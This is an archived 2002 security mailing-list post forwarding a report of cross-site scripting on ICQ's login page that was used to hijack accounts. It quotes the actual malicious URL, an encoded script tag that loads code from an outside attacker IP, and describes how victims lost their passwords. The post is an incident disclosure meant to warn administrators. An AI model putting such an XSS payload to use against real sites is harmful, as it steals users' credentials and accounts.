Hosting Provided By

Re: Top Ten Web App Sec Problems

From: Alex Lambert <alambert(at)webmaster.com>
Date: Mon Dec 02 2002 - 19:44:24 EST

Here's one from incidents/bugtraq today:

From: "Rafael Coninck Teigao" <rafael@SafeCore.NET> To: "SecurityFocus - Bugtraq" <bugtraq@securityfocus.com>; "Security Focus' INCIDENTS" <INCIDENTS@securityfocus.com> Sent: Monday, December 02, 2002 10:29 AM Subject: [Fwd: XSS on ICQ leading to password compromise]

> Moderator:
> I've sent the following email to bugtraq last week. Haven't seen it on
> the list, but it came to my attention that even more account's were
> hijacked this way.
> I'm also sending this to incidents, because I think that maybe some
> administrators are receiving similar complaints from their users and
> could (perhaps) block the XSS pages somehow.
>
> -------- Original Message --------
> From: Rafael Coninck Teigao <rafael@SafeCore.NET>
> Subject: XSS on ICQ leading to password compromise
> To: SecurityFocus - Bugtraq <bugtraq@securityfocus.com>
> CC: horvath@avalon.sul.com.br, ahi@TELEFONICAEMPRESAS.NET.BR,nbso@nic.br
>
> Hello, pp.
> I've tried to find some representative from de ICQ technical staff
> but had no success so far.
> Anyway, here's what's happening:
> A friend of mine got the following address on his ICQ from a friend
> on his contact list:
>

http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<s cript%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E </script%3e
>
> we can clearly see the <script... part on it. Unfortunately, he
> couldn't.
> When the page opened, he typed his email address and password. Five
> minutes later he was disconnected from ICQ and was unable to login
> again.
> He then tried to recover his password and saw that it was set to:
> aaaaa
> a
> that's right, it has a new line on it.
> The source on the script is:
> http://200.158.50.245/web/icq.asa
> That IP address comes from an ADSL from Telesp. The date and time of
> the incident were Nov/24 at 20:12 (GMT -2).
>
> He also told me that the friend who sent him the address and another
> person had their accounts hijacked as well.
>
> Best regards,
> Rafael Coninck Teigao
> SafeCore Network Solutions
> http://SafeCore.NET
> +55 41 224 1785
>
> --

*snipped footers*

apl

Original Message ----- From: "Kevin Spett" <kspett@spidynamics.com> To: "Richard M. Smith" <rms@computerbytesman.com>; <webappsec@securityfocus.com> Sent: Monday, December 02, 2002 5:28 PM Subject: Re: Top Ten Web App Sec Problems

> There have been a number of publicized Hotmail problems that were being
a
> window saying "Oh, I'm sorry you'll have to log in again" or something.
Received on Mon Dec 2 19:47:45 2002

This message: [ Message body ]
Next message: Alex Russell: "Re: Top Ten Web App Sec Problems"
In reply to Kevin Spett: "Re: Top Ten Web App Sec Problems"
Next in thread: Marc Slemko: "Re: Top Ten Web App Sec Problems"
Reply: Marc Slemko: "Re: Top Ten Web App Sec Problems"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:45 EDT